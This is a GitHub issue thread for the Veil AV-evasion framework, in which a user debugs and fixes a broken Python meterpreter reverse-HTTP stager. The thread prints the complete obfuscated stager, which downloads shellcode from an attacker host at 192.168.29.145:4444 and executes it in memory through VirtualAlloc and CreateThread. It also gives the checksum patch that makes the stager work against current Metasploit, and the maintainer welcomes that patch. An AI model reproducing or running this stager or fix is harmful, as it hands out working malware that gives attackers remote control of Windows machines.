Open pythonart opened 3 years ago
I was able to identify the issue by referring to metasploits code at lib/rex/payloads/meterpreter/uri_checksum.rb Basically, Metasploit now requires a checksum of at least 40 characters. Hence as a quick fix i modified the payload as below. for GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,50)) to use 50 digits instead of 3 to generate a check sum.
import urllib.request, string, random, ctypes as gWBruXFY
AAAAA='84Y5NBmNT2qVo5Sh9eGL4wdPtqt8y9MEUcY4UoDbmwXv3cL6al-EM_Muv-Initf5rkfJGsg4JJHNIttk_DUWruzET6mYKkrJqZx2hPhBgoaLedUbkeEJrMSB74lB_UlWrNw96uImnS'
def mxpzRtVtg(s): return sum([ord(ch) for ch in s]) % 0x100
def zXchxRKil():
for x in range(64):
GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,**50**))
BbpKiVAkCKA = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for vddmbn in BbpKiVAkCKA:
if mxpzRtVtg(GSRBCheNtxSd + vddmbn) == 92: return GSRBCheNtxSd + vddmbn
def LlceZjXpOsmpECO(zXjfwOXx, XPpqPxgpQIzbk):
DHSKoMgpytS = urllib.request.ProxyHandler({})
uDfJcx = urllib.request.build_opener(DHSKoMgpytS)
urllib.request.install_opener(uDfJcx)
BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + zXchxRKil(), None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})
#BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + AAAAA, None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})
try:
OgWAtgNFNeTXzB = urllib.request.urlopen(BujmkFRSdXQ)
try:
if int(OgWAtgNFNeTXzB.info()["Content-Length"]) > 100000: return OgWAtgNFNeTXzB.read()
else: return ''
except: return OgWAtgNFNeTXzB.read()
except urllib.request.URLError:
return ''
def gzzEVGFKdQcsY(ozgjuhs):
if ozgjuhs != "":
ImvVOrRoqWIWK = bytearray(ozgjuhs)
tPeTLiESurd = gWBruXFY.windll.kernel32.VirtualAlloc(gWBruXFY.c_int(0),gWBruXFY.c_int(len(ImvVOrRoqWIWK)), gWBruXFY.c_int(0x3000),gWBruXFY.c_int(0x40))
tUIenYmsHfAiPZa = (gWBruXFY.c_char * len(ImvVOrRoqWIWK)).from_buffer(ImvVOrRoqWIWK)
gWBruXFY.windll.kernel32.RtlMoveMemory(gWBruXFY.c_int(tPeTLiESurd),tUIenYmsHfAiPZa, gWBruXFY.c_int(len(ImvVOrRoqWIWK)))
vHhSRkfqcncViN = gWBruXFY.windll.kernel32.CreateThread(gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.c_int(tPeTLiESurd),gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.pointer(gWBruXFY.c_int(0)))
gWBruXFY.windll.kernel32.WaitForSingleObject(gWBruXFY.c_int(vHhSRkfqcncViN),gWBruXFY.c_int(-1))
sjWtpZKZ = ''
sjWtpZKZ = LlceZjXpOsmpECO("192.168.29.145", 4444)
gzzEVGFKdQcsY(sjWtpZKZ)
Suggest the source code for below be modified to match lib/rex/payloads/meterpreter/uri_checksum.rb URI generator methord. Veil/tools/evasion/payloads/python/meterpreter/rev_http.py / Veil/tools/evasion/payloads/python/meterpreter/rev_https.py /
Temporary fix would be to change below line and modify the value 3 to any number more than 40. payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n"
Hey, thanks for sending this patch over. Appreciate it! Any chance you want to submit it as a pull request just to you get the credit?
Hi Chris, I am not familiar with submissions. Kindly do it for me. I am not keen on getting the credit.
Veil version
Veil | [Version]: 3.1.14
OS Used - all info (architecture, linux flavor, etc)
Linux 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
How did you install Veil? (Apt, Clone from Github, etc.)
Apt
Did you run the setup script?
Yes
Pastebin link to error you are encountering (include console actions you took prior to error)
https://pastebin.pl/view/105eae92
Expected behavior
Sucessfull uploading of stager & followed by windows meterpreter session on attack machine.
Any additional info you want to tell me